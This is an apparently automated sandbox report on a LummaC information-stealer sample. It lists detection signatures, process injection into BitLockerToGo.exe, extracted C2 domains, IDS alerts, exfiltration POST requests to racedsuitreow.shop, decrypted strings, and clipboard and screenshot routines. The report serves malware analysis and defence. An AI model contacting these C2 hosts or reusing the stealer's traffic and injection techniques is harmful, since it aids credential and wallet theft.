Edit tour

Windows Analysis Report
iq2HxA0SLw.exe

Overview

General Information

Sample name:	iq2HxA0SLw.exe renamed because original name is a hash value
Original sample name:	da6f9e46eacbde011e7d9a6e742d05c9.exe
Analysis ID:	1519274
MD5:	da6f9e46eacbde011e7d9a6e742d05c9
SHA1:	a022be00f60db2721120fbbf2acdd4435e86706a
SHA256:	ac4b0d4dbdb661c626eef6c128ab65bbf2de3112dde7ef4d526520d1bae9d29f
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC, Go Injector, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Go Injector

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

iq2HxA0SLw.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\iq2HxA0SLw.exe" MD5: DA6F9E46EACBDE011E7D9A6E742D05C9)

BitLockerToGo.exe (PID: 2600 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop", "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop"], "Build id": "tLYMe5--rui333"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
iq2HxA0SLw.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: iq2HxA0SLw.exe PID: 2992	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:47:01.378739+0200	2054653	1	A Network Trojan was detected	192.168.2.9	49708	104.21.37.97	443	TCP
2024-09-26T09:47:02.487821+0200	2054653	1	A Network Trojan was detected	192.168.2.9	49709	104.21.37.97	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:47:01.378739+0200	2049836	1	A Network Trojan was detected	192.168.2.9	49708	104.21.37.97	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:47:02.487821+0200	2049812	1	A Network Trojan was detected	192.168.2.9	49709	104.21.37.97	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:47:01.202824+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.9	49708	104.21.37.97	443	TCP
2024-09-26T09:47:01.975769+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.9	49709	104.21.37.97	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T09:47:00.715068+0200	2056078	1	Domain Observed Used for C2 Detected	192.168.2.9	54044	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: priooozekw.shop	Avira URL Cloud: Label: malware
Source: surroundeocw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api$&	Avira URL Cloud: Label: malware
Source: racedsuitreow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/xy	Avira URL Cloud: Label: malware
Source: covvercilverow.shop	Avira URL Cloud: Label: malware
Source: pianoswimen.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api=	Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop	Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop	Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop	Avira URL Cloud: Label: malware
Source: deallyharvenw.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.iq2HxA0SLw.exe.c0009c2000.6.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop", "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop"], "Build id": "tLYMe5--rui333"}

Multi AV Scanner detection for submitted file

Source: iq2HxA0SLw.exe

ReversingLabs: Detection: 58%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.5% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: covvercilverow.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: surroundeocw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abortinoiwiam.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pumpkinkwquo.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: priooozekw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: deallyharvenw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: defenddsouneuw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: racedsuitreow.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pianoswimen.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tLYMe5--rui333

Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2

Source: iq2HxA0SLw.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0296D1A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0296D1A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	5_2_0296F860
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_0299FCBC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_029AA2AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_0299B3F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_029AA310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	5_2_0298A324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_029880AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+60h]	5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	5_2_0298E19C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	5_2_029871F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	5_2_0297B130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, ecx	5_2_02974166
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi+029B6029h], 00000000h	5_2_029736C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_029736C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	5_2_029A8650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ecx	5_2_0297E669
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	5_2_0298C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	5_2_0298C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_02973756
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [029B33A4h]	5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_029904D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_0298E419
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_02987450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	5_2_02988446
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	5_2_0297F467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	5_2_029A4590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_029A7BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	5_2_02965BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	5_2_029A5B00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	5_2_02964B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	5_2_029AAB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	5_2_029A5850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+58h]	5_2_0297590B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	5_2_0298EE86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	5_2_029AAE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	5_2_029AAE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h	5_2_02973F86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_02984FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_02991FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	5_2_0298BF1C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	5_2_02980F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000004B0h]	5_2_0297DCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	5_2_029AACF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	5_2_0298ECF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc edi	5_2_02973C2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	5_2_029A1DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_02988D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_02988D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	5_2_0298CD0C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	5_2_029A4D00

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.9:54044 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49708 -> 104.21.37.97:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: racedsuitreow.shop
Source: Malware configuration extractor	URLs: priooozekw.shop
Source: Malware configuration extractor	URLs: defenddsouneuw.shop
Source: Malware configuration extractor	URLs: pianoswimen.shop
Source: Malware configuration extractor	URLs: surroundeocw.shop
Source: Malware configuration extractor	URLs: abortinoiwiam.shop
Source: Malware configuration extractor	URLs: pumpkinkwquo.shop
Source: Malware configuration extractor	URLs: covvercilverow.shop
Source: Malware configuration extractor	URLs: deallyharvenw.shop

Source: Joe Sandbox View

IP Address: 104.21.37.97 104.21.37.97

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: racedsuitreow.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: pianoswimen.shop
Source: global traffic	DNS traffic detected: DNS query: racedsuitreow.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop

Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: iq2HxA0SLw.exe	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F09000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api
Source: BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api$&
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api=
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/xy
Source: BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862478504.0000000002F81000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_02998800

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_02998800

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 5_2_02999341 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

5_2_02999341

Source: iq2HxA0SLw.exe, 00000000.00000000.1418035635.00007FF6A92C2000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckRegCreateKeyExWRegDeleteValueWmissing address/etc/mdns.allowunknown network is unavailableHanifi_RohingyaPsalter_Pahlavix509usepoliciesinvalid boolean0601021504Z0700non-minimal tagunknown Go typeinvalid padding (no semicolon)alsologtostderrstderrthresholdaccept-encodingaccept-languageAccept-EncodingPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keyheap_idle_bytesstack_sys_bytesmspan_sys_bytesother_sys_bytesprocess_max_fdsduplicated name"UNIMPLEMENTED"InvalidArgumentUnauthenticatedUNAUTHENTICATEDinvalid kind %vCardinality(%d)weak_dependencyextension_rangeproto3_optionalunverified_lazyfeature_supportutf8_validationaggregate_valueedition_removedExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetRawInputDataInsertMenuItemWIsWindowEnabledPostQuitMessageSetActiveWindowSetWinEventHookTrackMouseEventWindowFromPointDrawThemeTextExmodulus by zerogetMillisecondsGroup: bad kindempty signature not a functionreflectlite.Setjstmpllitinterptarinsecurepathzipinsecurepathinvalid pointerBelowExactAboveResponseTimeoutMissingEndpoint#multipartfilesAccept-LanguageX-Forwarded-For()<>@,;:\"/[]?=GAUGE_HISTOGRAMAuthInfo is nilAuthInfo: <nil>15:04:05.000000/debug/requestsCLSIDFromProgIDStringFromCLSIDTLS_VERSION_1_0TLS_VERSION_1_1TLS_VERSION_1_2TLS_VERSION_1_3unclosed actionno dot in fieldtemplate clauseEurope (Zurich)Europe (London)access-analyzerapi.iotwirelessapi.mediatailorarc-zonal-shiftcloudcontrolapicloudtrail-datadata.mediastorefips-af-south-1fips-ap-south-1fips-ap-south-2fips-eu-north-1fips-eu-south-1fips-eu-south-2fips-me-south-1aws-marketplaceaws-global-fipsinternetmonitordata-ap-south-1af-south-1-fipsap-south-1-fipsap-south-2-fipseu-north-1-fipseu-south-1-fipseu-south-2-fipsme-south-1-fipslicense-managermachinelearningmessaging-chimemobileanalyticsmturk-requesterfips-aws-globalmobiletargetingresource-groupsroute53resolverwellarchitectedui-ca-central-1ui-eu-central-1China (Beijing)China (Ningxia)fips-cn-north-1data-cn-north-1avx512vpopcntdqcontenteditablehtml/template: NO_SIDE_EFFECTSLEGACY_REQUIREDLENGTH_PREFIXEDDiacriticalDot;DoubleRightTee;DownLeftVector;GreaterGreater;HorizontalLine;InvisibleComma;InvisibleTimes;LeftDownVector;LeftRightArrow;Leftrightarrow;LessSlantEqual;LongRightArrow;Longrightarrow;LowerLeftArrow;NestedLessLess;NotGreaterLess;NotLessGreater;NotSubsetEqual;NotVerticalBar;OpenCurlyQuote;ReverseElement;RightTeeVector;RightVectorBar;ShortDownArrow;ShortLeftArrow;SquareSuperset;TildeFullEqual;UpperLeftArrow;ZeroWidthSpace;curvearrowleft;doublebarwedge;downdownarrows;hookrightarrow;leftleftarrows;leftrightarrow;leftthreetimes;longrightarrow;looparrowright;nshortparallel;ntriangleright;rightarrowtail;rightharpoonup;trianglelefteq;upharpoonright;Co

memstr_477571fa-d

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_029A0161	5_2_029A0161
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 5_2_02970770	5_2_02970770
